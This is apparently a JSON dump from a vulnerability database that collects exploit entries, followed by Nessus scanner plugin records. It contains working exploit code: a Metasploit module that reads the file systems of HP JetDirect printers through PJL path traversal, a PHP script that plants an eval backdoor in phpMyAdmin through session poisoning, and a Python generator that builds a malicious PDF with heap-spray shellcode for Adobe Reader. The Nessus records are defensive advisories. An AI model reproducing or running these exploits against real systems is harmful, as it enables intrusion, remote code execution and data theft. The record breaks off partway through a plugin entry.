exit\r\n# [*] ->'/' to return to file system root\r\n# [*] ->'..' to move up to one directory\r\n# [*] ->'!r FILE' to read FILE on current directory\r\n#\r\n# [*] Enter RPATH:\r\n# $ > webServer/config\r\n# [*] cd /hp/webServer/config ...\r\n# [+] Server returned the following response:\r\n#\r\n# . TYPE=DIR\r\n# .. TYPE=DIR\r\n# soe.xml TYPE=FILE SIZE=23615\r\n# version.6 TYPE=FILE SIZE=45\r\n#\r\n#\r\n# [*] Current RPATH: /hp/webServer/config\r\n# [*] -> 'quit' to exit\r\n# [*] ->'/' to return to file system root\r\n# [*] ->'..' to move up to one directory\r\n# [*] ->'!r FILE' to read FILE on current directory\r\n#\r\n# [*] Enter RPATH:\r\n# $ > !r version.6\r\n# [*] cat /hp/webServer/config/version.6 ...\r\n# [+] Server returned the following response:\r\n#\r\n# WebServer directory version. Do not delete!\r\n#\r\n#\r\n# [*] Current RPATH: /hp/webServer/config\r\n# [*] -> 'quit' to exit\r\n# [*] ->'/' to return to file system root\r\n# [*] ->'..' to move up to one directory\r\n# [*] ->'!r FILE' to read FILE on current directory\r\n#\r\n# [*] Enter RPATH:\r\n# $ > quit\r\n# [*] Exited ... Have fun with your Printer!\r\n# [*] Auxiliary module execution completed\r\n \r\n \r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'HP JetDirect PJL Interface Universal Path Traversal',\r\n 'Version' => '$Revision: 1 $',\r\n 'Description' => %q{\r\n This module exploits path traveresal issue in possibly all HP network-enabled printer series, especially those which enable Printer Job Language (aka PJL) command interface through the default JetDirect port 9100.\r\n With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified.\r\n },\r\n 'Author' => [\r\n 'Moritz Jodeit <http://www.nruns.com/>', # Bug Discoverer\r\n 'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module \r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2010-4107' ],\r\n [ 'URL', 'http://www.nruns.com/_downloads/SA-2010%20003-Hewlett-Packard.pdf' ], \r\n [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02004333' ], \r\n [ 'URL', 'http://www.irongeek.com/i.php?page=security/networkprinterhacking' ],\r\n [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-laserjet-printer.rb' ],\r\n [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-OfficeJet-Printer.rb' ],\r\n [ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ]\r\n ],\r\n 'DisclosureDate' => '2010-11-15'))\r\n \r\n register_options(\r\n [\r\n \r\n OptString.new('RPATH',\r\n [\r\n true,\r\n \"The remote filesystem path to browse or read\",\r\n \"/\"\r\n ]\r\n ),\r\n OptBool.new('INTERACTIVE',\r\n [\r\n false,\r\n \"Enter interactive mode [msfconsole Only]\",\r\n false\r\n ]\r\n ),\r\n \r\n Opt::RPORT(9100)\r\n ],self.class)\r\n \r\n \r\n end\r\n \r\n def run\r\n mode = datastore['INTERACTIVE']\r\n \r\n if mode == true\r\n set_interactive(datastore['RPATH'])\r\n else\r\n set_onetime(datastore['RPATH'])\r\n end\r\n end\r\n \r\n def set_interactive(spath)\r\n action = 'DIR'\r\n rpath = spath\r\n rfpath = ''\r\n tmp_path = ''\r\n tmp_file = ''\r\n cur_dir = '/'\r\n \r\n print_status(\"Entering interactive mode\")\r\n stop = false\r\n \r\n set_onetime(rpath)\r\n \r\n until stop == true \r\n print_status(\"Current RPATH: #{rpath}\")\r\n print_status(\"-> 'quit' to exit\")\r\n print_status(\"->'/' to return to file system root\")\r\n print_status(\"->'..' to move up to one directory\")\r\n print_status(\"->'!r FILE' to read FILE on current directory\\r\\n\")\r\n print_status(\"Enter RPATH:\")\r\n print(\"$ > \")\r\n \r\n tmp_path = gets.chomp.to_s \r\n \r\n \r\n if tmp_path =~ /\\.\\./ && rpath.length > 2\r\n old_path = rpath\r\n new_path = rpath[0,rpath.rindex('/')]\r\n if new_path != nil\r\n rpath = new_path\r\n else\r\n rpath = '/'\r\n end\r\n rpath = '/' if rpath.length == 0\r\n print_status(\"Change to one up directory: #{rpath}\")\r\n elsif tmp_path =~ /\\!r\\s/ \r\n cur_dir = rpath\r\n tmp_file = tmp_path.gsub('!r ','')\r\n rfpath = cur_dir + '/' + tmp_file\r\n rfpath = rfpath.gsub('//','/') \r\n action = 'FILE'\r\n \r\n elsif tmp_path == '/'\r\n rpath = '/'\r\n elsif rpath != '/'\r\n rpath = rpath + '/' << tmp_path\r\n else\r\n rpath = rpath << tmp_path\r\n end\r\n if rpath =~ /quit/\r\n stop= true\r\n rpath = '/'\r\n print_status(\"Exited ... Have fun with your Printer!\")\r\n else\r\n rpath = rpath.gsub('//','/') \r\n if action == 'FILE'\r\n set_onetime(rfpath,action)\r\n cur_dir = rpath\r\n else\r\n set_onetime(rpath,action)\r\n end\r\n action = 'DIR' \r\n end\r\n end\r\n end\r\n \r\n def set_onetime(spath,saction = datastore['ACTION'])\r\n \r\n rpathx = spath\r\n action = saction\r\n rpathx = '/' if rpathx =~ /\\/quit/\r\n \r\n connect\r\n \r\n dir_cmd = \"\\x1b%[email\u00a0protected] FSDIRLIST NAME=\\\"0:/../../../[REPLACE]\\\" ENTRY=1 COUNT=99999999\\x0d\\x0a\\x1b%-12345X\\x0d\\x0a\"\r\n file_cmd = \"\\x1b%[email\u00a0protected] FSUPLOAD NAME=\\\"0:/../../../[REPLACE]\\\" OFFSET=0 SIZE=99999999\\x0d\\x0a\\x1b%-12345X\\x0d\\x0a\"\r\n \r\n if action =~ /DIR/\r\n r_cmd = dir_cmd.sub(\"[REPLACE]\",rpathx)\r\n print_status(\"cd #{rpathx} ...\")\r\n else\r\n r_cmd = file_cmd.sub(\"[REPLACE]\",rpathx)\r\n print_status(\"cat #{rpathx} ...\") \r\n end\r\n \r\n \r\n \r\n recv = sock.put(r_cmd)\r\n res = sock.get(-1,1)\r\n \r\n if (!res)\r\n print_error(\"ERROR in receiving data!\\r\\n\")\r\n else\r\n if res.to_s =~ /ERROR/\r\n print_error(\"Operation Not Permitted or File/DIR Not Found!\\r\\n\")\r\n disconnect\r\n return\r\n end\r\n resx = res.to_s[res.index(\"\\r\\n\")+1,res.length]\r\n print_good(\"Server returned the following response:\\r\\n#{resx}\")\r\n end\r\n \r\n disconnect \r\n \r\n end\r\n \r\n \r\nend\r\n\r\n\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16623"}, {"lastseen": "2018-04-08T01:47:24", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2011-07-09T00:00:00", "published": "2011-07-09T00:00:00", "id": "1337DAY-ID-16503", "href": "https://0day.today/exploit/description/16503", "type": "zdt", "title": "phpMyAdmin 3.x Swekey Remote Code Injection Exploit", "sourceData": "<?php /*\r\n# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit\r\n# Date: 2011-07-09\r\n# Author: Mango of ha.xxor.se\r\n# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1\r\n# CVE : CVE-2011-2505, CVE-2011-2506\r\n# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt\r\n# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\r\n*/\r\necho php_sapi_name()!=='cli'?'<pre>':'';?>\r\n .\r\n , )\\ .\r\n . ,/) , / ) , )\\\r\n )\\( /)/( (__( /( / ) __ __ ________ __ __\r\n / \\ ( )| |) \\ / | |\\ /| | | | | | | | (__)\r\n( ______ / | |_____( ______ | | \\/ | | __ __ | |__| | ___| | __ ___________ __ __ _____\r\n \\| | \\ \\ | | | |)| | \\ \\ | | | | | | | | | | | | / / | | | | | | | | | | | | | |\r\n | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|\r\n==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== \r\n phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []\r\n Remote Code Injection [] [][] [] [] [] [] [] []\r\n http://ha.xxor.se [][] [] [] [] [][] [][] [] []\r\n _ _ ___ __ ____ __ ___ ___ \r\n | |-| || _ |\\ /\\ /| _ || ) \r\n |_|-|_||_|_|/_._\\/_._\\|___||_|_\\ \r\n ___ ___ ___ _ _ ___ ___ __ __ \r\n ( < | [_ / /| || || )(_)| |\\ | /\r\n >__)|_[_ \\__\\|____||_|_\\|_| |_| |_|\r\n \r\nUse responsibly.\r\n \r\n<?php echo php_sapi_name()!=='cli'?'</pre>':'';\r\n \r\nif(php_sapi_name()==='cli'){\r\n if(!isset($argv[1])){\r\n output(\" Usage\\n \".$argv[0].\" http://example.com/phpMyAdmin-3.3.9.2\");\r\n killme();\r\n }\r\n $pmaurl = $argv[1];\r\n}else{\r\n $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';\r\n}\r\n$code = 'foreach($_GET as $k=>$v)if($k===\"eval\")eval($v);';\r\n$cookie = null;\r\n$token = null;\r\nif(!function_exists('curl_init')){\r\n output('[!] Fatal error. Need cURL!');\r\n killme();\r\n}\r\n$ch = curl_init();\r\n$debug = 0;\r\nif(php_sapi_name()!=='cli'){\r\n?>\r\n<form method=post>\r\nURL: <input name=url value=\"<?php echo htmlspecialchars($pmaurl);?>\"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>\r\n<input name=submit type=submit value=\u00e2\u2122\u00a5>\r\n</form>\r\n<pre>\r\n<?php\r\nif(!isset($_REQUEST['submit']))killme(true);\r\n}\r\n \r\noutput(\"[i] Running...\");\r\n \r\n// Start a session and get a token\r\ncurl_setopt_array($ch, array(\r\n CURLOPT_URL => $pmaurl.'/setup/index.php',\r\n CURLOPT_HEADER => 1,\r\n CURLOPT_RETURNTRANSFER => 1,\r\n CURLOPT_TIMEOUT => 4,\r\n CURLOPT_SSL_VERIFYPEER => false,\r\n CURLOPT_SSL_VERIFYHOST => false\r\n));\r\noutput(\"[*] Contacting server to retrive session cookie and token.\");\r\n \r\n$result = curl_exec($ch);\r\nif(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){\r\n output(\"[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.\");\r\n killme();\r\n}\r\nif(!$result){\r\n output(\"[!] cURL error:\".curl_error($ch));\r\n killme();\r\n}\r\nif(false !== strpos($result, 'Cannot load or save configuration')){\r\n output(\"[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.\");\r\n killme();\r\n}\r\n \r\n// Extract cookie\r\npreg_match('/phpMyAdmin=([^;]+)/', $result, $matches);\r\n$cookie = $matches[1];\r\noutput(\"[i] Cookie:\".$cookie);\r\n// Extract token\r\npreg_match('/(token=|token\" value=\")([0-9a-f]{32})/', $result, $matches);\r\n$token = $matches[2];\r\noutput(\"[i] Token:\".$token);\r\n \r\n// Poison _SESSION variable\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);\r\ncurl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);\r\noutput(\"[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.\");\r\nif(!$result = curl_exec($ch)){\r\n output(\"[!] cURL error:\".curl_error($ch));\r\n killme();\r\n}\r\n \r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n \r\n// Save file\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');\r\ncurl_setopt($ch, CURLOPT_POST, 1);\r\ncurl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);\r\noutput(\"[*] Contacting server to make it save the injected code to a file.\");\r\nif(!$result = curl_exec($ch)){\r\n output(\"[!] cURL error:\".curl_error($ch));\r\n killme();\r\n}\r\n \r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n \r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');\r\ncurl_setopt($ch, CURLOPT_POST, 0);\r\noutput(\"[*] Contacting server to test if the injected code executes.\");\r\nif(!$result = curl_exec($ch)){\r\n output(\"[!] cURL error:\".curl_error($ch));\r\n killme();\r\n}\r\nif(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){\r\n output(\"[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!\");\r\n output(\"[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';\");\r\n}else{\r\n output(\"[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.\");\r\n}\r\n \r\n \r\ncurl_close($ch);\r\n \r\nfunction output($msg){\r\n echo php_sapi_name()!=='cli'?htmlspecialchars(\"$msg\\n\",ENT_QUOTES):\"$msg\\n\";\r\n flush();\r\n}\r\n \r\nfunction killme(){\r\n output(\"[*] Exiting...\");\r\n echo php_sapi_name()!=='cli'?'<pre>':'';\r\n die();\r\n}\r\n \r\necho php_sapi_name()!=='cli'?'<pre>':'';?>\r\n\r\n\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16503"}], "seebug": [{"lastseen": "2017-11-19T16:13:06", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67248", "id": "SSV:67248", "title": "Adobe Reader and Acrobat", "type": "seebug", "sourceData": "\n #\r\n# Author : Ahmed Obied (ahmed.obied@gmail.com)\r\n#\r\n# This program generates a PDF file that exploits a vulnerability (CVE-2009-4324) \r\n# in Adobe Reader and Acrobat. The generated PDF file was tested using Adobe \r\n# Reader 9.2.0 on Windows XP SP3. The exploit's payload spawns the calculator.\r\n#\r\n# Usage : python adobe_newplayer.py [output file name]\r\n# \r\n\r\nimport sys\r\n\r\nclass PDF:\r\n \r\n def __init__(self):\r\n self.xrefs = []\r\n self.eol = '\\x0d\\x0a'\r\n self.content = ''\r\n self.xrefs_offset = 0\r\n \r\n def header(self):\r\n self.content += '%PDF-1.1' + self.eol \r\n \r\n def obj(self, obj_num, data):\r\n self.xrefs.append(len(self.content))\r\n self.content += '%d 0 obj' % obj_num\r\n self.content += self.eol + '<< ' + data + ' >>' + self.eol\r\n self.content += 'endobj' + self.eol\r\n \r\n def ref(self, ref_num):\r\n return '%d 0 R' % ref_num \r\n \r\n def xref(self):\r\n self.xrefs_offset = len(self.content)\r\n self.content += 'xref' + self.eol\r\n self.content += '0 %d' % (len(self.xrefs) + 1)\r\n self.content += self.eol\r\n self.content += '0000000000 65535 f' + self.eol\r\n for i in self.xrefs:\r\n self.content += '%010d 00000 n' % i\r\n self.content += self.eol\r\n \r\n def trailer(self):\r\n self.content += 'trailer' + self.eol\r\n self.content += '<< /Size %d' % (len(self.xrefs) + 1)\r\n self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol\r\n self.content += 'startxref' + self.eol\r\n self.content += '%d' % self.xrefs_offset\r\n self.content += self.eol\r\n self.content += '%%EOF'\r\n \r\n def generate(self): \r\n return self.content\r\n\r\nclass Exploit:\r\n \r\n def convert_to_utf16(self, payload):\r\n enc_payload = ''\r\n for i in range(0, len(payload), 2):\r\n num = 0\r\n for j in range(0, 2):\r\n num += (ord(payload[i + j]) & 0xff) << (j * 8)\r\n enc_payload += '%%u%04x' % num\r\n return enc_payload\r\n \r\n def get_payload(self):\r\n # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub\r\n # http://metasploit.com\r\n payload = '\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x6f'\r\n payload += '\\x02\\xb1\\x0e\\x83\\xeb\\xfc\\xe2\\xf4\\x93\\xea\\xf5\\x0e\\x6f\\x02\\x3a\\x4b'\r\n payload += '\\x53\\x89\\xcd\\x0b\\x17\\x03\\x5e\\x85\\x20\\x1a\\x3a\\x51\\x4f\\x03\\x5a\\x47'\r\n payload += '\\xe4\\x36\\x3a\\x0f\\x81\\x33\\x71\\x97\\xc3\\x86\\x71\\x7a\\x68\\xc3\\x7b\\x03'\r\n payload += '\\x6e\\xc0\\x5a\\xfa\\x54\\x56\\x95\\x0a\\x1a\\xe7\\x3a\\x51\\x4b\\x03\\x5a\\x68'\r\n payload += '\\xe4\\x0e\\xfa\\x85\\x30\\x1e\\xb0\\xe5\\xe4\\x1e\\x3a\\x0f\\x84\\x8b\\xed\\x2a'\r\n payload += '\\x6b\\xc1\\x80\\xce\\x0b\\x89\\xf1\\x3e\\xea\\xc2\\xc9\\x02\\xe4\\x42\\xbd\\x85'\r\n payload += '\\x1f\\x1e\\x1c\\x85\\x07\\x0a\\x5a\\x07\\xe4\\x82\\x01\\x0e\\x6f\\x02\\x3a\\x66'\r\n payload += '\\x53\\x5d\\x80\\xf8\\x0f\\x54\\x38\\xf6\\xec\\xc2\\xca\\x5e\\x07\\x7c\\x69\\xec'\r\n payload += '\\x1c\\x6a\\x29\\xf0\\xe5\\x0c\\xe6\\xf1\\x88\\x61\\xd0\\x62\\x0c\\x2c\\xd4\\x76'\r\n payload += '\\x0a\\x02\\xb1\\x0e'\r\n return self.convert_to_utf16(payload)\r\n \r\n def get_exploit(self):\r\n exploit = '''\r\n \r\n function spray_heap()\r\n {\r\n var chunk_size, payload, nopsled;\r\n \r\n chunk_size = 0x8000;\r\n payload = unescape("<PAYLOAD>");\r\n nopsled = unescape("<NOP>");\r\n while (nopsled.length < chunk_size)\r\n nopsled += nopsled;\r\n nopsled_len = chunk_size - (payload.length + 20); \r\n nopsled = nopsled.substring(0, nopsled_len);\r\n heap_chunks = new Array();\r\n for (var i = 0 ; i < <CHUNKS> ; i++)\r\n heap_chunks[i] = nopsled + payload;\r\n } \r\n \r\n function trigger_bug()\r\n {\r\n util.printd("1.000000000000000000000000 : 0000000", new Date());\r\n try {\r\n media.newPlayer(null);\r\n } catch(e) {}\r\n util.printd("1.000000000000000000000000 : 0000000", new Date());\r\n }\r\n \r\n spray_heap();\r\n trigger_bug();\r\n \r\n '''\r\n exploit = exploit.replace('<PAYLOAD>', self.get_payload())\r\n exploit = exploit.replace('<NOP>', '%u0d0d%u0d0d')\r\n exploit = exploit.replace('<CHUNKS>', '1200') \r\n return exploit \r\n \r\ndef generate_pdf():\r\n exploit = Exploit()\r\n pdf = PDF()\r\n pdf.header()\r\n pdf.obj(1, '/Type /Catalog /Outlines ' + pdf.ref(2) + ' /Pages ' + pdf.ref(3) + ' /OpenAction ' + pdf.ref(5))\r\n pdf.obj(2, '/Type /Outlines /Count 0') \r\n pdf.obj(3, '/Type /Pages /Kids [' + pdf.ref(4) + '] /Count 1')\r\n pdf.obj(4, '/Type /Page /Parent ' + pdf.ref(3) + ' /MediaBox [0 0 612 792]')\r\n pdf.obj(5, '/Type /Action /S /JavaScript /JS (%s)' % exploit.get_exploit()) \r\n pdf.xref()\r\n pdf.trailer()\r\n return pdf.generate()\r\n \r\ndef main():\r\n if len(sys.argv) != 2:\r\n print 'Usage: python %s [output file name]' % sys.argv[0]\r\n sys.exit(0)\r\n file_name = sys.argv[1]\r\n if not file_name.endswith('.pdf'):\r\n file_name = file_name + '.pdf'\r\n try:\r\n fd = open(file_name, 'w')\r\n fd.write(generate_pdf()) \r\n fd.close()\r\n print '[-] PDF file generated and written to %s' % file_name\r\n except IOError:\r\n print '[*] Error : An IO error has occurred'\r\n print '[-] Exiting ...'\r\n sys.exit(-1)\r\n \r\nif __name__ == '__main__':\r\n main()\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67248"}], "nessus": [{"lastseen": "2019-02-21T01:18:16", "bulletinFamily": "scanner", "description": "The acroread packages as shipped in Red Hat Enterprise Linux 3 Extras contain security flaws and should not be used.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable Document Format (PDF).\n\nAdobe Reader 8.1.7 is vulnerable to critical security flaws and should no longer be used. A specially crafted PDF file could cause Adobe Reader to crash or, potentially, execute arbitrary code as the user running Adobe Reader when opened. (CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955, CVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. Adobe Reader 9 for Linux is not compatible with Red Hat Enterprise Linux 3.\nAn alternative PDF file viewer available in Red Hat Enterprise Linux 3 is xpdf.\n\nThis update removes the acroread packages due to their known security vulnerabilities.", "modified": "2018-07-25T00:00:00", "id": "REDHAT-RHSA-2010-0060.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63914", "published": "2013-01-24T00:00:00", "title": "RHEL 3 : acroread (RHSA-2010:0060)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0060. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63914);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/25 18:58:05\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n script_bugtraq_id(37331, 37758);\n script_xref(name:\"RHSA\", value:\"2010:0060\");\n\n script_name(english:\"RHEL 3 : acroread (RHSA-2010:0060)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The acroread packages as shipped in Red Hat Enterprise Linux 3 Extras\ncontain security flaws and should not be used.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nAdobe Reader 8.1.7 is vulnerable to critical security flaws and should\nno longer be used. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. (CVE-2009-4324, CVE-2009-3953,\nCVE-2009-3954, CVE-2009-3955, CVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. Adobe\nReader 9 for Linux is not compatible with Red Hat Enterprise Linux 3.\nAn alternative PDF file viewer available in Red Hat Enterprise Linux 3\nis xpdf.\n\nThis update removes the acroread packages due to their known security\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.adobe.com/support/security/bulletins/apsb10-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0060.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread-uninstall package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-uninstall\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"acroread-uninstall-9.3-3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:16", "bulletinFamily": "scanner", "description": "Updated acroread packages that fix multiple security issues and three bugs are now available for Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable Document Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These vulnerabilities are summarized on the Adobe Security Advisory APSB10-02 page listed in the References section. A specially crafted PDF file could cause Adobe Reader to crash or, potentially, execute arbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955, CVE-2009-3959, CVE-2009-3956)\n\nThis update also fixes the following bugs :\n\n* the acroread process continued to run even after closing a PDF file.\nIf multiple PDF files were opened and then closed, the acroread processes continued to run and consume system resources (up to 100% CPU usage). With this update, the acroread process correctly exits, which resolves this issue. (BZ#473217)\n\n* the PPKLite.api plug-in was missing, causing Adobe Reader to crash when attempting to open signed PDF files. For such files, if an immediate crash was not observed, clicking on the Signature Panel could trigger one. With this update, the PPKLite.api plug-in is included, which resolves this issue. (BZ#472975)\n\n* Adobe Reader has been upgraded to version 9.3. (BZ#497957)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All users of Adobe Reader are advised to install these updated packages, which contain Adobe Reader version 9.3, which is not vulnerable to these issues and fixes these bugs. All running instances of Adobe Reader must be restarted for the update to take effect.", "modified": "2018-11-28T00:00:00", "id": "REDHAT-RHSA-2010-0037.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63911", "published": "2013-01-24T00:00:00", "title": "RHEL 5 : acroread (RHSA-2010:0037)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0037. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63911);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/11/28 11:42:04\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n script_bugtraq_id(37331, 37756, 37757, 37758, 37761, 37763);\n script_xref(name:\"RHSA\", value:\"2010:0037\");\n\n script_name(english:\"RHEL 5 : acroread (RHSA-2010:0037)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is 